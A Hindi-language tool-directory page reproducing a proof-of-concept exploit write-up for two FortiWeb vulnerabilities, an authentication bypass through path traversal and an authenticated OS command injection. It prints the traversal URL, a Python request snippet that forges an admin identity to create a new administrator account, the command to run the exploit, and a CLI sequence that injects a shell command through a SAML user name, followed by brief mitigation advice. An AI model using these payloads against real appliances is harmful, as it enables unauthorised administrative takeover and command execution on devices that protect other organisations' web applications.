Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FORTIWEB_CVE-2025-64446-58034 — FortiWeb CVEs के लिए PoC शोषण: पथ ट्रैवर्सल के माध्यम से प्रमाणीकरण बाईपास और प्रमाणित OS कमांड इंजेक्शन। इसमें विस्तृत विश्लेषण, पेलोड और सुरक्षा परीक्षण के लिए शमन मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/eagle-nett/fortiweb_cve-2025-64446-58034
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubeagle-nett/fortiweb_cve-2025-64446-58034

FORTIWEB_CVE-2025-64446-58034

FortiWeb CVEs के लिए PoC शोषण: पथ ट्रैवर्सल के माध्यम से प्रमाणीकरण बाईपास और प्रमाणित OS कमांड इंजेक्शन। इसमें विस्तृत विश्लेषण, पेलोड और सुरक्षा परीक्षण के लिए शमन मार्गदर्शन शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
135 महीने पहलेअभी तक समीक्षित नहीं

FortiWeb शोषण सिमुलेशन (CVE-2025-64446 और CVE-2025-58034)

नोट:

  • यह दस्तावेज़ केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है।
  • अनुमति के बिना सिस्टम पर हमला करने के लिए उपयोग न करें।

1. अवलोकन

FortiWeb एक वेब एप्लिकेशन फ़ायरवॉल (WAF) उपकरण है जिसका उपयोग वेब एप्लिकेशन की सुरक्षा के लिए किया जाता है।

वर्ष 2025 में, दो गंभीर कमजोरियाँ खोजी गईं:

  • CVE-2025-64446 – पथ ट्रैवर्सल के माध्यम से प्रमाणीकरण बाईपास
  • CVE-2025-58034 – ओएस कमांड इंजेक्शन

2. CVE-2025-64446 का अवलोकन

आइटमविवरण
कमजोरी का प्रकारसापेक्ष पथ ट्रैवर्सल
प्रमाणीकरण बाईपास
कारणFortiWeb प्रमाणीकरण से पहले पथ को सख्ती से संभाल नहीं करता है:

- तार्किक पथ स्ट्रिंग के आधार पर अभिगम नियंत्रण
- पूर्ण पथ को सामान्य नहीं करता
- आंतरिक संसाधनों तक पहुँचने के लिए ../ के उपयोग की अनुमति देता है
विवरणकुछ प्रशासनिक एंडपॉइंट बिना उचित प्रमाणीकरण के एक्सेस किए जा सकते हैं
प्रभाव- प्रमाणीकरण को पूरी तरह से बायपास करें
- प्रशासन कार्यक्षमता तक अनधिकृत पहुँच
- अनुमति मॉडल को तोड़ें
प्रभावित संस्करण- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

उदाहरण:

/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. CVE-2025-58034 का अवलोकन

आइटमविवरण
कमजोरी का प्रकारओएस कमांड इंजेक्शन (CWE-78)
कारणFortiWeb ऑपरेटिंग सिस्टम कमांड निष्पादित करते समय इनपुट को असुरक्षित तरीके से संभालता है:

- इनपुट मान्य नहीं करता
- विशेष वर्णों से बचने की कमी
- उपयोगकर्ता डेटा को सीधे सिस्टम कमांड में पास करता है
विवरणकमजोरी के लिए प्रमाणीकरण की आवश्यकता होती है लेकिन सिस्टम कमांड सम्मिलित करने की अनुमति देता है
प्रभाव- अनपेक्षित कमांड निष्पादन
- सिस्टम संसाधनों तक पहुँच
- अखंडता और उपलब्धता को प्रभावित करता है
प्रभावित संस्करण- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

4. प्रायोगिक प्रक्रिया (POC)

4.1. वातावरण तैयार करना:

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

यह लाइब्रेरी संस्करण विरोध से बचने, कार्य वातावरण की स्थिरता सुनिश्चित करने और सिस्टम पर प्रभाव को सीमित करने में मदद करता है

venv-git

4.2 शोषण

Payload

 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Python3 का उपयोग करके टूल चलाएँ:

python3 exploit.py <IP_target>
  • <IP_target>: यहाँ IP पता FortiWeb उपकरण का होस्टनाम है।

exploit

उपयोगकर्ता नाम और पासवर्ड प्राप्त करें -> लॉगिन करें

login

कनेक्ट

सफलतापूर्वक शोषण किया और प्रशासक अधिकारों वाला नया खाता बनाया।

4.3 खाते में लॉग इन करने के बाद CVE-2025-58034 का शोषण

नव निर्मित प्रशासक खाते से सफलतापूर्वक लॉग इन करने के बाद, हमलावर विशेष रूप से तैयार अनुरोधों के माध्यम से या सीधे FortiWeb CLI कमांड-लाइन इंटरफ़ेस के माध्यम से प्रमाणित कमांड इंजेक्शन कमजोरी का शोषण कर सकता है:

config user saml-user

edit "`id`" ## यहाँ कमांड दर्ज करें

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

FortiWeb कॉन्फ़िगरेशन स्ट्रिंग से बाहर निकलेगा और saml-user कॉन्फ़िगर करने की प्रक्रिया में id कमांड निष्पादित करेगा।

5. कमजोरियों को कम करने के कुछ तरीके

  • FortiWeb को पैच किए गए संस्करण में अपडेट करें।
  • प्रशासनिक इंटरफ़ेस तक पहुँच सीमित करें।
  • प्रबंधन इंटरफ़ेस को इंटरनेट पर एक्सपोज़ न करें।
  • असामान्य प्रशासक खातों की जाँच करें।

6. अतिरिक्त संदर्भ

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
टूल डाउनलोड करें